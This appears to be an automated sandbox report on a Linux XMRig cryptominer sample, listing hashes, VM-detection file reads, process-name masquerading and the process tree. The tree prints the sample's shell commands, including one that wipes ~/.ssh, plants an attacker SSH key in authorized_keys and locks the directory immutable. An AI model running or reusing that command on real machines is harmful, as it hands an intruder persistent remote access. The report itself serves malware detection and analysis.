Analysis
- max time kernel: 299s
- max time network: 287s
- platform: ubuntu-22.04_amd64
- resource: ubuntu2204-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
- submitted: 03-01-2025 07:30
Behavioral task
- task: behavioral1
- Sample: .kswapd00
- Resource: ubuntu2204-amd64-20240611-en
General
- Target: .kswapd00
- Size: 2.1MB
- MD5: 1c36e8aaac825bcb9a086ecf2a471c89
- SHA1: 66cb901aadae8db4511a364024d555427d78d3f9
- SHA256: 7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
- SHA512: 8a65ee52874ec24b4dda49e63153aec981bd310c49245f5d26592824a1ad0da52c7233c31e7a380ba1fe9aeff6f453db1345686eceafb8b6dfd80f9eef25dda1
- SSDEEP: 49152:WWD683TqbMtemJOGmHBox1Q6jtSVVO7EHsq8:J6dM3OGUCoPVs7EH8
Malware Config
Signatures
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
- resource: behavioral1/memory/1587-1-0x0000000000400000-0x0000000000a65ff8-memory.dmp
  yara_rule: xmrig
Attempts to change immutable files 6 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid / Process:
- 1591 chattr
- 1592 chattr
- 1593 sh
- 1594 sh
- 1595 chattr
- 1597 chattr
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Process .kswapd00, file opened for reading:
- /sys/devices/virtual/dmi/id/sys_vendor
- /sys/devices/virtual/dmi/id/product_name
- /sys/devices/virtual/dmi/id/board_vendor
- /sys/devices/virtual/dmi/id/bios_vendor
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Process .kswapd00, file opened for reading:
- /sys/devices/virtual/dmi/id/board_serial
- /sys/devices/virtual/dmi/id/chassis_vendor
- /sys/devices/virtual/dmi/id/chassis_type
- /sys/devices/virtual/dmi/id/chassis_version
- /sys/devices/virtual/dmi/id/bios_version
- /sys/devices/virtual/dmi/id/product_version
- /sys/devices/virtual/dmi/id/board_name
- /sys/devices/virtual/dmi/id/product_uuid
- /sys/devices/virtual/dmi/id/bios_date
- /sys/devices/virtual/dmi/id/board_asset_tag
- /sys/devices/virtual/dmi/id/chassis_serial
- /sys/devices/virtual/dmi/id/chassis_asset_tag
- /sys/devices/virtual/dmi/id/product_serial
- /sys/devices/virtual/dmi/id/board_version
Changes its process name 2 IoCs
Changes the process name, possibly in an attempt to hide itself:
- new name kauditd0, pid 1587, Process .kswapd00
- new name sshd@notty, pid 1588, Process .kswapd00
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Process .kswapd00, file opened for reading:
- /proc/cpuinfo
Reads CPU attributes 1 TTPs 45 IoCs
Process .kswapd00, file opened for reading:
- /sys/devices/system/cpu/cpu0/topology/die_cpus
- /sys/devices/system/cpu/cpu0/cache/index0/size
- /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
- /sys/devices/system/cpu/cpu0/cache/index3/size
- /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
- /sys/devices/system/cpu/cpu0/topology/package_cpus
- /sys/devices/system/cpu/cpu0/cache/index1/id
- /sys/devices/system/cpu/cpu0/cache/index3/level
- /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
- /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map
- /sys/devices/system/cpu/possible
- /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cache/index2/id
- /sys/devices/system/cpu/cpu0/cache/index3/type
- /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cpu_capacity
- /sys/devices/system/cpu/cpu0/topology/core_id
- /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
- /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
- /sys/devices/system/cpu/cpu0/cache/index3/id
- /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
- /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cache/index2/type
- /sys/devices/system/cpu/cpu0/cache/index2/size
- /sys/devices/system/cpu/online
- /sys/devices/system/cpu/cpu0/topology/physical_package_id
- /sys/devices/system/cpu/cpu0/cache/index0/level
- /sys/devices/system/cpu/cpu0/cache/index0/id
- /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map
- /sys/devices/system/cpu/cpu0/topology/core_cpus
- /sys/devices/system/cpu/cpu0/cache/index1/level
- /sys/devices/system/cpu/cpu0/cache/index1/type
- /sys/devices/system/cpu/cpu0/cache/index2/level
- /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cpufreq/base_frequency
- /sys/devices/system/cpu/cpu0/topology/cluster_cpus
- /sys/devices/system/cpu/cpu0/cache/index0/type
- /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
- /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
- /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
- /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
- /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Process .kswapd00, file opened for reading:
- /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
- /sys/devices/system/node/node0/access1/initiators
- /sys/devices/virtual/dmi/id
- /sys/fs/cgroup/cpuset.mems.effective
- /sys/kernel/mm/hugepages
- /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
- /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages
- /sys/devices/system/node/online
- /sys/firmware/dmi/tables/smbios_entry_point
- /sys/devices/system/node/node0/access0/initiators
- /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages
- /sys/fs/cgroup/cpuset.cpus.effective
- /sys/devices/system/cpu
- /sys/devices/system/node/node0/cpumap
- /sys/devices/system/node/node0/hugepages
- /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages
- /sys/devices/system/node/node0/meminfo
- /sys/bus/dax/devices
- /sys/devices/system/node/node0/access0/initiators/write_bandwidth
- /sys/devices/system/node/node0/access0/initiators/read_latency
- /sys/devices/system/node/node0/access0/initiators/write_latency
- /sys/fs/cgroup/cgroup.controllers
- /sys/devices/system/node/node0/access0/initiators/read_bandwidth
- /sys/firmware/dmi/tables/DMI
Reads runtime system information
Process .kswapd00, file opened for reading:
- /proc/93/cmdline
- /proc/112/cmdline
- /proc/223/cmdline
- /proc/self/cpuset
- /proc/21/cmdline
- /proc/25/cmdline
- /proc/80/cmdline
- /proc/88/cmdline
- /proc/1312/cmdline
- /proc/1401/cmdline
- /proc/76/cmdline
- /proc/988/cmdline
- /proc/1158/cmdline
- /proc/1471/cmdline
- /proc/86/cmdline
- /proc/90/cmdline
- /proc/118/cmdline
- /proc/446/cmdline
- /proc/738/cmdline
- /proc/3/cmdline
- /proc/75/cmdline
- /proc/101/cmdline
- /proc/1201/cmdline
- /proc/1259/cmdline
- /proc/1576/cmdline
- /proc/92/cmdline
- /proc/582/cmdline
- /proc/838/cmdline
- /proc/1116/cmdline
- /proc/1160/cmdline
- /proc/1588/cmdline
- /proc/4/cmdline
- /proc/14/cmdline
- /proc/23/cmdline
- /proc/209/cmdline
- /proc/780/cmdline
- /proc/584/cmdline
- /proc/650/cmdline
- /proc/761/cmdline
- /proc/2/cmdline
- /proc/99/cmdline
- /proc/109/cmdline
- /proc/221/cmdline
- /proc/411/cmdline
- /proc/1177/cmdline
- /proc/1168/cmdline
- /proc/1272/cmdline
- /proc/1554/cmdline
- /proc/5/cmdline
- /proc/79/cmdline
- /proc/214/cmdline
- /proc/762/cmdline
- /proc/1041/cmdline
- /proc/1599/cmdline
- /proc/mounts
- /proc/213/cmdline
- /proc/588/cmdline
- /proc/1090/cmdline
- /proc/1108/cmdline
- /proc/695/cmdline
- /proc/959/cmdline
- /proc/1175/cmdline
- /proc/17/cmdline
- /proc/27/cmdline
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Process .kswapd00, file opened for modification:
- /tmp/cert.pem
- /tmp/cert_key.pem
Processes
- /tmp/.kswapd00 (PID 1587)
  Command line: /tmp/.kswapd00
  Signatures:
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Changes its process name
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  - Writes file to tmp directory
  - /bin/sh (PID 1589)
    Command line: sh -c "sh -c 'chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh' >> /dev/null 2>&1"
    - /usr/bin/sh (PID 1590)
      Command line: sh -c "chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh"
      - /usr/bin/chattr (PID 1591)
        Command line: chattr -ia "~/.ssh"
        Signatures:
        - Attempts to change immutable files
      - /usr/bin/chattr (PID 1592)
        Command line: chattr +ia "~/.ssh"
        Signatures:
        - Attempts to change immutable files
  - /bin/sh (PID 1593)
    Command line: sh -c "sh -c 'chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json' >>/dev/null 2>&1"
    Signatures:
    - Attempts to change immutable files
    - /usr/bin/sh (PID 1594)
      Command line: sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"
      Signatures:
      - Attempts to change immutable files
      - /usr/bin/chattr (PID 1595)
        Command line: chattr -ia "~/.xmrig.json"
        Signatures:
        - Attempts to change immutable files
      - /usr/bin/rm (PID 1596)
        Command line: rm -rf "~/.xmrig.json"
      - /usr/bin/chattr (PID 1597)
        Command line: chattr -ia "~/.config/xmrig.json"
        Signatures:
        - Attempts to change immutable files
      - /usr/bin/rm (PID 1598)
        Command line: rm -rf "~/.config/xmrig.json"
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: 99c24798cefa2dd4d36b695585f5e818
  SHA1: 127f1982010e782d3cc223ad8f6eafac838df226
  SHA256: 10c199bed53bed342f1737ff7a954e7821a7b96631448c1853950ca7d2c34be0
  SHA512: 14368c835f2ff8b803d4e5725ada27214de31b1eb4482e56ad7c04afb95d5ee675b2e1b175396d7e6092734d3946760814ce5daaad68c40c53a279d6a47290dc
- Filesize: 5B
  MD5: 32b3fd0dac3d8c344f97fddd263e4d65
  SHA1: 4081bd590df5bea25ef9106c0e38ab31c33caf84
  SHA256: fa2ee8b60b8f5d897641819a70415cd602060df5d1379a07f5e4ed987c6e947d
  SHA512: 1d0568e1b2c5937e1972d57d2347bbf58130745a2b841585adc4c731041f76a00f6af0eee866c7aa68d672af42f58fdd69cfd5033b9e65ed01554d4df2c14a33